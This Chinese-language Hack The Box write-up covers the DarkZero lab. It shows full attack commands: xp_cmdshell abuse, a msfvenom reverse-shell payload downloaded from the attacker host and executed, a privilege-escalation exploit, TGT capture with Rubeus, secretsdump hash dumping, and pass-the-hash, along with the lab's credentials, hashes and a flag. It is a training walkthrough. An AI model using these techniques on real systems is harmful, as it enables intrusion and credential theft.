HTB:DarkZero[WriteUP]

张开发
2026/4/13 7:03:05 15 分钟阅读

最新文章

推荐文章

相关文章

分享文章

HTB:DarkZero[WriteUP]
连接至HTB服务区并启动靶机靶机IP10.10.11.89IP可能有变动分配IP10.10.16.29IP可能有变动已有凭据账户john.w密码RFulUtONCOL!信息收集使用rustscan对靶机TCP端口进行开放扫描rustscan -a 10.10.11.89 | grep -E ^[0-9] | tee ports_scan_res.txt提取出开放端口ports$(cut -d/ -f1 ports_res.txt | paste -sd,)┌──(root㉿kali)-[/home/kali/Desktop/temp]└─# ports$(cut -d/ -f1 ports_scan_res.txt | paste -sd,)┌──(root㉿kali)-[/home/kali/Desktop/temp]└─# echo $ports53,88,135,139,389,445,464,593,636,1433,2179,3268,3269,5985,9389,49664,49667,49676,49677,49897,49940,50010,62844使用nmap对靶机TCP开放端口进行脚本、服务扫描nmap -sT -p$ports -sCV -Pn 10.10.11.89需要重点关注的端口与服务53端口DNS服务88端口Kerveros服务389端口LDAP服务445端口SMB服务1433端口SQL Server服务5985端口WinRM服务使用nmap对靶机UDP端口进行开放扫描nmap -sU --top-ports 50 -Pn 10.10.11.89使用nmap对靶机UDP开放端口进行脚本、版本扫描nmap -sU -p53,123 -sCV -Pn 10.10.11.89使用nxc验证凭据发现可以登录MSSQLnxc mssql DC01.darkzero.htb -u john.w -p RFulUtONCOL!┌──(root㉿kali)-[/home/kali/Desktop/temp]└─# nxc mssql DC01.darkzero.htb -u john.w -p RFulUtONCOL!MSSQL 10.10.11.89 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)MSSQL 10.10.11.89 1433 DC01 [] darkzero.htb\john.w:RFulUtONCOL!边界突破使用impacket-mssqlclient连接靶机MSSQLimpacket-mssqlclient darkzero.htb/john.w:RFulUtONCOL!DC01.darkzero.htb -windows-auth通过枚举出来的链接服务器连接到远程SQL Server实例use_link DC02.darkzero.ext查询远程SQL Server实例登录账户列表enum_logins由输出可见当前登录账户为sysadmin权限尝试直接开启xp_cmdshellenable_xp_cmdshellSQL DC02.darkzero.ext (dc01_sql_svc dbomaster) enable_xp_cmdshellINFO(DC02): Line 196: Configuration option show advanced options changed from 0 to 1. Run the RECONFIGURE statement to install.INFO(DC02): Line 196: Configuration option xp_cmdshell changed from 0 to 1. Run the RECONFIGURE statement to install.尝试通过xp_cmdshell执行命令xp_cmdshell whoami在攻击机生成MSF木马msfvenom -a x64 -p windows/x64/meterpreter_reverse_tcp LHOST10.10.16.34 LPORT1425 -f exe -o msf.exe┌──(root㉿kali)-[/home/kali/Desktop/temp]└─# msfvenom -a x64 -p windows/x64/meterpreter_reverse_tcp LHOST10.10.16.34 LPORT1425 -f exe -o msf.exe[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payloadNo encoder specified, outputting raw payloadPayload size: 230982 bytesFinal size of exe file: 238080 bytesSaved as: msf.exe在攻击机使用python开启http服务python -m http.server 8888控制靶机下载该木马exec xp_cmdshell curl http://10.10.16.34:8888/msf.exe -o C:\Windows\Temp\msf.exe在攻击机配置好监听模块控制靶机触发该木马exec xp_cmdshell C:\Windows\Temp\msf.exe成功获得MeterpreterShellmeterpreter run post/windows/manage/migrate[*] Running module against DC02 (172.16.20.2)[*] Current server process: msf.exe (1068)[*] Spawning notepad.exe process to migrate into[*] Spoofing PPID 0[*] Migrating into 3380[] Successfully migrated into process 3380meterpreter getuidServer username: darkzero-ext\svc_sql权限提升运行自动提权扫描run post/multi/recon/local_exploit_suggester切换到windows/local/cve_2024_30088_authz_basep模块进行权限提升利用切换到shell在Administrator桌面上找到了user.txt文件横向移动上传一个Rubeus并启动TGT监听功能.\Rubeus.exe monitor /interval:1 /nowrap使用impacket-mssqlclient重新连接至DC01.darkzero.htb的SQL Server实例impacket-mssqlclient darkzero.htb/john.w:RFulUtONCOL!DC01.darkzero.htb -windows-auth使用xp_dirtree功能访问DC02.darkzero.extxp_dirtree \\DC02.darkzero.ext\x0da6h成功捕获TGT账户DC01$票据doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJBhggSMMIIEiKADAgEFoQ4bDERBUktaRVJPLkhUQqIhMBgAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uSFRCo4IETDCCBEigAwIBEqEDAgECooIEOgSCBDbZRcHLj6QOxrDrJ/P6OSlBHEdDKhQ/tjBn9Xbp0P/WFIKA9277kVzQVtsWzk6DuRmFy6fl/M9fU9bT2nJdt7H9HNht6bqrxtkclIwQA93zhGqowgDiSq45WedJ1vPnrD448VCNmrsCdPww/hWfrNliVFDBenknaL7uyYUys/q2wY/87nC6c4lebGmeD5RVaDzKSD/qZGcEDMpNmhARYFBFww/qswCN6/7PHBWDHVf8X4pYJJInbxcmNaWCo4r7LjqEyf0pvQEeO007FmuBMAbv9viX3LR1MygvyVXNlFE92wsMHk5by3Yy6JU/BsM4nNuNLVtBlPtBGOMxnuaRreFBCOa2VjNf89Un4z/WxS3sTJU/Yi4TRV2D69WSMiDy3pX1Bb0/XyqlfMEmqcCr2MePu8EKdrOCILOulydomgcBY7GI2edO7V3cuYXrkUztCIekSj1xL8LOOcobxP7/c8OxEJ2jh5SRrhxjO0c80RYSDcZhEEI5eQKPBIIhGTt83SC1vB9XptWYS6wvKeHUugLf8y8lTpSkqU6auUUIsqB3AutJpyv60l0ZXTu1DiDzhuST/sYo5Jxk3cQ9LO6NH10BlZg9OrZjQj5PPYbkNXLfoexsTnBL9gGxtyBV1x6gwaIJLQ57LShyAZ5HNA6tdtRQxBzWr/ChkrZyGhp/f0hYPtrwsGpWCM5UTXut8ni4O74GdbRByvso3UwXEHbtMRj7ai3SojNbOgoNMTV4iswR8s8Y/RU8Oi2ajzRJ5K44R9zpGeJ5NF9IBN7LTF9uYkg6i4QQ96EhhV58uq8Q7h1LrHULaxxlWODq/B0IHF/ceZCFfSqFrBNgz2l00KJdPH2pik9lmHEqqzWFFE5o8Pnc3pjh6RU8GjK7CrY6CryNZu3eEEOgh27kyNDcDtPxhwmK4A1kIMPPVOdAvMTHxlfjUV9PtkySv5StZPsumrR8gv8HHCVNZQVxAxLAGs5upFsMKjo99SEc/UPsNIvUeGnANi6TP7p5IVbOXXIvQn83BcUdBNxPlPlHMc4QA1yZdjRsdRIAe4ojtlGfom9JVtDrDd8RTjLX/N1ktbAIQnUzRrDs73EPugcOuSIv3KvBF3Wj3kJ1M7Khv7CZmBGEOm2WR9/HTlaNMf/IvjHMv4nEds6r9OylVBC0tR7/xtoO6dEqtwGo9iwnkfdK0xoPWK29OGS3LtHqUsDJxWh/7JmVC2wTSTzOYMPucQF7ozOw9689CdMnq4YCvFavEZ0AG7nkk5lZGAe77XDmdkVThUTstJiveRwmigkxmrGaCNjEPw7HY4xCsYgxpZG8pSx8MsBBADoPxNpVgaAfH226MN1IALW802lwabBAddp4RRJSz3fXCgf9IapoKAwAC/mZ/yS7Gi0UePGP/8JjiMSsahwq/fJjhlxTgFIWJxIIl6Ho4HjMIHgoAMCAQCigdgEgdV9gdIwgcggcwwgckwgcagKzApoAMCARKhIgQgVnOnkmHr0jTu/9OegyEuXEURmfLgtOhhtkpVFEU5xmGhDhsMREFSS1pFUk8uSFRCohIwEKADAgEBoQkwBxsFREMwMSSjBwMFAGChAAClERgPMjAyNjAxMTUxNDUzMThaphEYDzIwMjYwMTE2MDA1MzE4WqcRGA8yMDI2MDEyMjE0NTMxOFqoDhsMREFSS1pFUk8uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5IVEI使用impacket-secretsdump转储DC01上的域账户密码哈希export KRB5CCNAME$(pwd)/ticket.ccache; ntpdate DC01.darkzero.htb; impacket-secretsdump -k -no-pass darkzero.htb/DC01$DC01.darkzero.htbAdministrator:500:aad3b435b51404eeaad3b435b51404ee:5917507bdf2ef2c2b0a869a1cba40726:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::krbtgt:502:aad3b435b51404eeaad3b435b51404ee:64f4771e4c60b8b176c3769300f6f3f7:::john.w:2603:aad3b435b51404eeaad3b435b51404ee:44b1b5623a1446b5831a7b3a4be3977b:::DC01$:1000:aad3b435b51404eeaad3b435b51404ee:d02e3fe0986e9b5f013dad12b2350b3a:::darkzero-ext$:2602:aad3b435b51404eeaad3b435b51404ee:5af27325cb298aac6e9412c20bbf77e1:::[*] Kerberos keys grabbedAdministrator:0x14:2f8efea2896670fa78f4da08a53c1ced59018a89b762cbcf6628bd290039b9cdAdministrator:0x13:a23315d970fe9d556be03ab611730673Administrator:aes256-cts-hmac-sha1-96:d4aa4a338e44acd57b857fc4d650407ca2f9ac3d6f79c9de59141575ab16cabdAdministrator:aes128-cts-hmac-sha1-96:b1e04b87abab7be2c600fc652ac84362Administrator:0x17:5917507bdf2ef2c2b0a869a1cba40726krbtgt:aes256-cts-hmac-sha1-96:6330aee12ac37e9c42bc9af3f1fec55d7755c31d70095ca1927458d216884d41krbtgt:aes128-cts-hmac-sha1-96:0ffbe626519980a499cb85b30e0b80f3krbtgt:0x17:64f4771e4c60b8b176c3769300f6f3f7john.w:0x14:f6d74915f051ef9c1c085d31f02698c04a4c6804d509b7c4442e8593d6d957eajohn.w:0x13:7b145a89aed458eaea530a2bd1eb93bdjohn.w:aes256-cts-hmac-sha1-96:49a6d3404e9d19859c0eea1036f6e95debbdea99efea4e2c11ee529add37717ejohn.w:aes128-cts-hmac-sha1-96:87d9cbd84d85c50904eba39d588e47dbjohn.w:0x17:44b1b5623a1446b5831a7b3a4be3977bDC01$:aes256-cts-hmac-sha1-96:25e1e7b4219c9b414726983f0f50bbf28daa11dd4a24eed82c451c4d763c9941DC01$:aes128-cts-hmac-sha1-96:9996363bffe713a6777597c876d4f9dbDC01$:0x17:d02e3fe0986e9b5f013dad12b2350b3adarkzero-ext$:aes256-cts-hmac-sha1-96:5f439bfb79745867f473ec9012c33fe1197dd0013a29ac7305af4b3f4a23997ddarkzero-ext$:aes128-cts-hmac-sha1-96:e87f4e4bff5718f5f5c03ea68cabdcaadarkzero-ext$:0x17:5af27325cb298aac6e9412c20bbf77e1使用impacket-psexec工具通过Administrator账户的密码哈希登录目标impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:5917507bdf2ef2c2b0a869a1cba40726 AdministratorDC01.darkzero.htbC:\Users\Administrator\Desktop dirVolume in drive C has no label.Volume Serial Number is EF7E-D912Directory of C:\Users\Administrator\Desktop07/31/2025 10:21 PM DIR .03/24/2025 03:38 AM DIR ..04/01/2026 02:15 AM 34 root.txt04/01/2026 02:15 AM 34 user.txt2 File(s) 68 bytes2 Dir(s) 6,261,907,456 bytes freeC:\Users\Administrator\Desktop type root.txtfefc0237964c6c9bbd997bd4b4b43ff4

更多文章